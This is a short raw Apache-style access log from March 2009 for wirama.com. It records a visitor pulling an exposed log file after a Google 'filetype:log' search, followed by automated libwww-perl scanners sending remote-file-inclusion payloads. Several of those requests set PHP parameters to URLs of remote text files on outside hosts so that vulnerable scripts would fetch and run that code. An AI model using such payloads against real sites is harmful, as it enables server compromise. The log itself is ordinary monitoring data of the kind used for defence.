78.157.94.72 - - [08/Mar/2009:04:39:10 -0700] "GET /logs/access_090101.log HTTP/1.1" 200 7270 "http://www.google.lt/search?hl=ru&q=filetype%3Alog+http+google" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; WebMoney Advisor; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "www.wirama.com"
78.157.94.72 - - [08/Mar/2009:04:39:23 -0700] "GET /logs/access_090101.log HTTP/1.1" 200 7270 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; WebMoney Advisor; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "www.wirama.com"
207.58.136.166 - - [08/Mar/2009:04:51:12 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.thenakedtruckerandt-bones.com/reads.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "wirama.com"
207.58.136.166 - - [08/Mar/2009:04:51:12 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.thenakedtruckerandt-bones.com/reads.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "wirama.com"
217.22.60.25 - - [08/Mar/2009:05:24:54 -0700] "GET /logs//add.php?APB_rp=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "wirama.com"
217.22.60.25 - - [08/Mar/2009:05:24:54 -0700] "GET /add.php?APB_rp=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "wirama.com"
217.22.60.25 - - [08/Mar/2009:05:30:02 -0700] "GET /logs//add.php?APB_rp=http://www.geocities.com/anzzo_cool/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "wirama.com"
217.22.60.25 - - [08/Mar/2009:05:30:02 -0700] "GET /add.php?APB_rp=http://www.geocities.com/anzzo_cool/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "wirama.com"
124.217.242.70 - - [08/Mar/2009:06:16:04 -0700] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.ydcommunity.com/board/data/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "wirama.com"
124.217.242.70 - - [08/Mar/2009:06:16:04 -0700] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.ydcommunity.com/board/data/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "wirama.com"
